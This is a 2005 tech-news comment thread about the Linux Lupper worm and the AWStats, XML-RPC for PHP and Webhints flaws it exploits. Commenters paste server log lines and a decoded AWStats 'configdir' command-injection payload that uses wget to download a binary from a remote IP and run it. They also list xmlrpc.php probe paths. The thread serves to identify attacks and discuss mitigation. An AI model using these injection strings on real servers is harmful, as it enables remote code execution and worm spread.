Linux Lupper.Worm In the WIld

jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm which also exists for BSD, just to be crossplatform. From the McAfee description: The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."

Re:Remarkably Useless page.

[gowen]

According to ZDNet/Symantec

"The worm exploits three vulnerabilities to propagate: the XML-RPC for PHP Remote Code Injection vulnerability; AWStats Rawlog Plugin Logfile Parameter Input Validation vulnerability; and Darryl Burgdorf's Webhints Remote Command Execution Vulnerability, according to Symantec's online description of the worm.

The XML-RPC flaw affects blogging, wiki and content management software and was discovered earlier this year. Patches are available for most systems. AWStats is a log analyzer tool; a fix for the flaw has been available since February. Darryl Burgdorf's Webhints is a hint generation script; no fixes are available for the script, according to Symantec's DeepSight Alert Services."

Re:PHP exploit, not directly a linux problem?

[mysqlrocks]

Calling it a PHP exploit would be wrong as well. It's an exploit of specific applications written in PHP (AWStats and Drupal from what I could tell).

Short of detail

[QuaintRealist]

So here is some, shamelessly cribbed from e-week. The worm actually attemts to attack three different web services:

"The XML-RPC hole commonly exists in blogging and Wiki programs. There are now fixes available for this hole for most systems.

AWStats is a popular, open-source log-file analyzer. Only servers which run AWStats 5.0 to 6.3 can be attacked. Versions 6.4, which came out in March, and higher are immune.

Finally, Webhints is an older script program that's designed to set up and maintain a "Hint (Quote/Tip/Joke/Whatever) of the Day" page. Version 1.3 is vulnerable to attack. There is, at this time, no known fix for the program. "

This still does not tell me which blogging/wiki programs are affected, only theat "most" have fixes - more info, anyone?

Does it look like this?

[Mabonus]

I just noticed this today, and from what I've heard here it sounds a likely candidate. IP addresses obscured for politeness.

193.166.84 - - [04/Nov/2005:15:10:10 -0700] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193 %2e244;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:12 -0700] "GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd %20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3b chmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e19 3%2e244;echo%20YYY;echo| HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:14 -0700] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193 %2e244;echo%20YYY;echo| HTTP/1.1" 401 3787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
.
.
.
193.166.84 - - [04/Nov/2005:15:10:31 -0700] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:33 -0700] "POST /blog/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
193.166.84 - - [04/Nov/2005:15:10:34 -0700] "POST /drupal/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
.
.
.
For 60 hits.

Other links

[AndroidCat]

Security Focus eWeek CNet

Re:Conditions for infection...

[smoking2000]

The command it runs is:

|echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen 216.102.212.115;echo YYY;echo|

It is passed to awstats.pl in a request like:

GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bc hmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e 212%2e115;echo%20YYY;echo| HTTP/1.1

There are also POST request to xmlrpc.php pages, like:

POST /drupal/xmlrpc.php HTTP/1.1

So if you have /tmp mounted noexec this should not be a problem.

It's not Windows

[max+born]

From the Security Focus article: Affected systems will need to be wiped and have the OS reinstalled, in most cases.

Apche usually runs as user nobody with very limited privileges. I doubt you'd need to wipe and reinstall the OS. That's why lupper runs in /tmp.

Re:Remarkably Useless page.

[harlows_monkeys]

More alarmist shit (and old news at tht - The Reg reported this last week)

My web server logs for my home machine are full of attempts to exploit these holes, coming from a large number of IP addresses.

This indicates that this is indeed in the wild, and active, and spreading.

Thus, it is not alarmist shit.

AWStats is a PHP application?

[smartfart]

Um, AWStats isn't written in PHP, but in Perl. This isn't a PHP worm, it's a CGI exploit which happens to target PHP apps, plus the occasional Perl app.